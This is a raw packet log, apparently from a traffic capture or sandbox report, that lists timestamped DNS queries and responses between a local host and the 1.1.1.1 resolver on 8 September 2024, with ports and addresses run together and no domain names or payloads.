                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784802914 CEST6002653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784876108 CEST6162153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784919024 CEST53571531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784997940 CEST5805253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785082102 CEST5475553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785186052 CEST5723953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785264969 CEST5532653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785547018 CEST6428453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785716057 CEST5172353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785831928 CEST5782253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785878897 CEST5044653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.786071062 CEST4991553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.786375046 CEST53577691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.786936998 CEST5563253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.789793015 CEST53512611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.791201115 CEST53637861.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.794851065 CEST53580521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.794862986 CEST53504571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795046091 CEST53600261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795056105 CEST53553261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795169115 CEST53578221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795319080 CEST53654301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795357943 CEST53517231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.795597076 CEST53642841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.796086073 CEST53547551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.798394918 CEST53556321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.801789045 CEST53572391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.801800013 CEST53619341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.802944899 CEST53635281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.804517031 CEST6404553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.815118074 CEST53616211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.817689896 CEST53504461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.817702055 CEST53499151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.821643114 CEST53640451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.847412109 CEST53588671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.856993914 CEST53583891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.570903063 CEST5256353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.581473112 CEST5935653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.583278894 CEST5659453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.586416960 CEST53525631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.588428974 CEST5812453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.590785027 CEST53593561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.593830109 CEST53565941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.597161055 CEST53581241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.602216005 CEST6423153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.604046106 CEST6524053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.609395027 CEST5317753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.611663103 CEST6299153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.612040043 CEST53642311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.612281084 CEST6495053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.613593102 CEST6440253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.614145041 CEST5678453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.614721060 CEST5229053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.614936113 CEST53652401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.615883112 CEST6092453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.617574930 CEST6087553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.618195057 CEST6128753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.620403051 CEST4967353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.621526957 CEST5635953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.622978926 CEST5284553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.623045921 CEST53649501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.624057055 CEST5102153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625096083 CEST5954453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625605106 CEST6274553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625622988 CEST53531771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625791073 CEST53609241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.626652956 CEST4998353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.627223969 CEST5336053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.628797054 CEST53612871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.628807068 CEST5225253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.629374981 CEST53629911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.629944086 CEST53496731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630057096 CEST53644021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630218029 CEST53522901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630672932 CEST53567841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630790949 CEST6423453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.634063005 CEST53595441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.634669065 CEST53510211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.636810064 CEST53563591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.637098074 CEST5097853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639367104 CEST5962553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639539003 CEST6373553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639590025 CEST53528451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639858007 CEST6492253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.640165091 CEST5016053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642298937 CEST53533601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642530918 CEST5553353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642781973 CEST5099453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643024921 CEST6315553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643546104 CEST53499831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643807888 CEST5742653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643991947 CEST53522521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.646464109 CEST53509781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.647053003 CEST53642341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.649569035 CEST53501601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651288033 CEST6528153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651515007 CEST6394753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651688099 CEST6106353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652487040 CEST53509941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652514935 CEST5475153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652518988 CEST53649221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652939081 CEST53574261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.653079987 CEST53637351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.655534029 CEST53627451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.655544996 CEST53596251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.657443047 CEST53555331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.659456968 CEST53631551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.660757065 CEST53639471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661616087 CEST6123453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661787987 CEST4957253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661874056 CEST5960553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661943913 CEST53652811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663011074 CEST5245153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663223982 CEST6154553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663311005 CEST5785453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663486958 CEST6268153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663665056 CEST5492653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663800955 CEST5143753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663957119 CEST6279653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664120913 CEST5072353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664268970 CEST6483353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664298058 CEST4975953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664427042 CEST5836153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664546967 CEST5793953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664637089 CEST5753853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666069984 CEST6508353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666497946 CEST6134653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.668591022 CEST53547511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.670886040 CEST5316653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671149015 CEST5278453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671346903 CEST53612341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671720982 CEST53596051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671996117 CEST53495721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.673211098 CEST53578541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.673245907 CEST53626811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.673351049 CEST53579391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.673628092 CEST53615451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.673670053 CEST53549261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.674104929 CEST53583611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.674117088 CEST53497591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.674190998 CEST53507231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.674413919 CEST53575381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.675324917 CEST53650831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.675982952 CEST5037353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676870108 CEST5352653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676968098 CEST5291853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677047968 CEST5723253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677146912 CEST6352653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677202940 CEST6044753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.679930925 CEST53524511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.680206060 CEST53531661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.681113005 CEST53527841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.682146072 CEST53610631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.683677912 CEST53635261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.686007023 CEST53503731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.686150074 CEST53572321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.686160088 CEST53535261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.687310934 CEST53604471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.692449093 CEST53529181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.695193052 CEST53514371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.695364952 CEST53648331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.697370052 CEST53613461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.773808002 CEST53608751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.820992947 CEST53627961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667628050 CEST5580253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667792082 CEST6481653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.677196980 CEST5841453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.679851055 CEST5112753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.680449009 CEST5979053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681027889 CEST6093453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681258917 CEST6129253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681708097 CEST5778053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681737900 CEST5208953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682246923 CEST6385653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682471991 CEST5705653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683506966 CEST5254053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683541059 CEST6095753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.684292078 CEST53558021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.684585094 CEST5277853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685456991 CEST5082153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685796022 CEST5170153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685832024 CEST5131053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686414957 CEST6378053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686672926 CEST4928653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686892986 CEST5180953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687210083 CEST6124653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687715054 CEST6242453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687854052 CEST53584141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.688721895 CEST5824653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691072941 CEST53597901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691124916 CEST5164353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691509962 CEST53609341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691868067 CEST5303253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.692045927 CEST53570561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.692465067 CEST53520891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.692701101 CEST53638561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.693084955 CEST53525401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.693696022 CEST53527781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.694843054 CEST6465253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.694983006 CEST53508211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.696170092 CEST53612461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.696882963 CEST53492861.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.696939945 CEST53518091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.698378086 CEST53624241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.700905085 CEST5640453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.702498913 CEST53582461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.702692032 CEST53530321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.703156948 CEST53517011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.704210997 CEST5954653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.705326080 CEST5150353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.710743904 CEST5577453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.711263895 CEST53511271.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.711684942 CEST53564041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.712786913 CEST53612921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713054895 CEST53577801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713314056 CEST6285553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713489056 CEST6300853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.715193033 CEST53515031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.716451883 CEST53513101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.717446089 CEST53637801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.721932888 CEST53557741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.722383976 CEST53630081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.723871946 CEST53628551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.729156971 CEST6022653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731163025 CEST5232553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731775999 CEST6194253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.733995914 CEST5317653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735034943 CEST53595461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735116005 CEST6326753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735850096 CEST5591753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.736519098 CEST5441853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.737396002 CEST5491153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.738671064 CEST6341253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.739741087 CEST6519853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.740585089 CEST6218153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.741461992 CEST53523251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.743247986 CEST53531761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.745086908 CEST53602261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.745206118 CEST53559171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.745826006 CEST53549111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.746104002 CEST53632671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.749361992 CEST53651981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.751710892 CEST53621811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.753093004 CEST53544181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.754628897 CEST5003853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.754873991 CEST5136453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.754890919 CEST53634121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755140066 CEST4980453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755285978 CEST6015753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755474091 CEST6020353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755567074 CEST6167653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755776882 CEST5704253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755842924 CEST6046453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756053925 CEST6133253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756329060 CEST5425053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756477118 CEST5312953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756702900 CEST6331253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757004976 CEST5788953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757095098 CEST5576553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757265091 CEST6173053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757359982 CEST5446153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757658958 CEST5213353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.758367062 CEST6502553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.758507967 CEST4922653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.759129047 CEST5854753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.759179115 CEST5564853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.763839006 CEST53616761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.764523983 CEST53513641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.764606953 CEST53619421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.764894009 CEST53498041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.765110016 CEST53570421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.765151024 CEST53602031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.765271902 CEST53613321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.765989065 CEST53542501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.766302109 CEST53604641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.766475916 CEST53578891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.767450094 CEST53650251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.768505096 CEST53585471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.768966913 CEST53492261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.770729065 CEST53601571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.772696018 CEST53531291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.774060011 CEST53500381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.788095951 CEST53544611.1.1.1192.168.2.9
